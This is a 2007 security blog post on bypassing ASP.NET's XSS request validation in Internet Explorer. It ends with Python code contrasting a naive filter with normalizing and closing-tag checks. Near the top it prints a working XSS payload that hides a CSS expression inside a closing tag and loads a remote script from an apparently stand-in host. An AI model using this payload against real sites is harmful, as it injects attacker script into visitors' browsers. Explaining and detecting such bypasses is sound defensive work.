---
layout: post
status: publish
published: true
title: Bypass ASP.NET XSS Protection in Internet Explorer
wordpress_id: 290
wordpress_url: http://pro.grammatic.org/post-bypass-aspnet-xss-protection-in-internet-explorer-8.aspx
date: !binary |-
  MjAwNy0wNS0xNSAxNDowMzoyNCArMDIwMA==
date_gmt: !binary |-
  MjAwNy0wNS0xNSAxNDowMzoyNCArMDIwMA==
categories:
- Technology
- InfoSec
- .NET
tags:
- information security
- .NET
comments: []
---
<p>ASP.NET comes preloaded with some default XSS protection which is actually pretty nifty. However, it turns out that the system can be circumvented by a variety of methods, as illustrated by this test input:</p>

{% highlight html %}
</a style="xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://www.site.com/JS.js')">
{% endhighlight %}

<p>Turns out that IE will still process attributes on closing tags, which circumvents the filter for <code>&lt;a</code>, whilst also treating <code>/**/</code> as a null comment, which the browser discards but which breaks .NET's filter regex. Thanks to Hong @ <a href="http://sla.ckers.org/forum/read.php?2,7462,8409%23msg-8409">sla.ckers</a>.</p>
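<p>To make the two weaknesses concrete from the filtering side, here is an added example (my own code, not ASP.NET's validator and not from the sla.ckers thread): a hypothetical naive filter that matches the literal <code>expression(</code> token, beside a check that first strips CSS comments the way the browser does and separately flags attributes on closing tags. The sample inputs are constructed; the first mirrors the pattern above with a harmless payload.</p>

```python
import re

# Constructed sample inputs. The first mirrors the closing-tag / split-token
# pattern from the post; the others are controls.
SAMPLES = {
    "closing_tag_comment_split": '</a style="xx:expr/**/ession(alert(1))">',
    "plain_expression": '<a style="xx:expression(alert(1))">',
    "benign_closing_tag": "</a>",
    "benign_style": '<div style="color:red">',
}

# Hypothetical naive filter: matches the raw string for the literal token.
# It stands in for any regex-only filter; it is NOT ASP.NET's own pattern.
EXPRESSION_TOKEN = re.compile(r"expression\s*\(", re.IGNORECASE)


def naive_filter_flags(s: str) -> bool:
    """Raw-string match: a /**/ inside the token splits it and is missed."""
    return bool(EXPRESSION_TOKEN.search(s))


def normalize_css(value: str) -> str:
    """Drop CSS comments (/* ... */) before matching, as the browser does."""
    return re.sub(r"/\*.*?\*/", "", value, flags=re.S)


def normalized_filter_flags(s: str) -> bool:
    """Match after normalization, so the split token is seen whole."""
    return bool(EXPRESSION_TOKEN.search(normalize_css(s)))


def closing_tag_with_attributes(s: str) -> bool:
    """Closing tags carry no attributes in HTML; anything after the tag name
    in a </tag ...> is a sign the input targets a lenient parser."""
    return bool(re.search(r"</[A-Za-z][A-Za-z0-9]*\s+\S", s))


def check(s: str) -> dict:
    """Run all three checks on one input and return their verdicts."""
    return {
        "naive": naive_filter_flags(s),
        "normalized": normalized_filter_flags(s),
        "closing_attr": closing_tag_with_attributes(s),
    }


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(name, check(sample))
```

<p>The naive check passes the split-token input while the normalized check and the closing-tag check both catch it; the benign inputs trip none of the three.</p>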